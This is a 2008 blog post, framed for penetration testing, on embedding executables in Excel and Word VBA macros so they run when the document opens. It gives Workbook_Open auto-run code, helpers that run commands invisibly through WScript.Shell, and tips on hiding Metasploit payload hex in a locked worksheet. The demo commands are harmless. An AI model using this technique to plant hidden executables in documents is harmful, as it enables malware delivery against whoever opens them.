Sunday, November 16, 2008

On VBA in Excel and Word Documents...

There have been a few posts around the interwebs recently on how to use VBA to boobytrap Excel or Word documents with executables that will run on startup. I've been playing with it a bit and thought I'd write a series of posts on my findings to store this info in one place, in case anyone else finds this stuff useful in pentests.

First, a quick note on converting executables to store in VBA. Based on my testing, the default Visual Basic Editor (VBE) that comes with MS Office 2003 (haven't tested 2007 yet) has a relatively low memory limit on how much you can store inside the script sections. This correlates to a max executable filesize of around 32k on my system. Anything larger than that you won't be able to paste in the output from metasploit's exe2vba because you will recieve an error message, "Not Enough Memory".

I'm sure you could convert this script to allow you to store the hex strings inside a hidden, locked worksheet and reference it from the code sections. I don't know how many of you will run into this, as many of the metasploit payloads are only around ~10k.

Back to VBA, we'll start with a couple of simple functions that will allow you to run invisible commands or programs on the system:

Sub Run_Cmd(command, visibility, wait_on_execute)
Dim WshShell As Variant
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "%COMSPEC% /c " & command, visibility, wait_on_execute
End Sub

Sub Run_Program(program, arguments, visibility, wait_on_execute)
Dim WshShell As Variant
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run program & " " & arguments & " ", visibility, wait_on_execute
End Sub


These would be called from within the "ThisWorkbook" tab in VBE with a function like:

Const VISIBLE = 1, INVISIBLE = 0
Const WAIT = True, NOWAIT = False

Sub Workbook_Open()
Run_Cmd "ping 127.0.0.1", VISIBLE, WAIT
Run_Program "notepad.exe", "", VISIBLE, NOWAIT
End Sub


INVISIBLE / VISIBLE does just what you would think: toggles the visibility of the program or command as you wish. WAIT / NOWAIT also functions as you would expect; if set to WAIT, the VBA execution will halt until the process finishes. NOWAIT continues execution as soon as the program/command begins.

1 comment:

lyndor said...

Great! it helped me a lot!!
Thanks :-)

Shai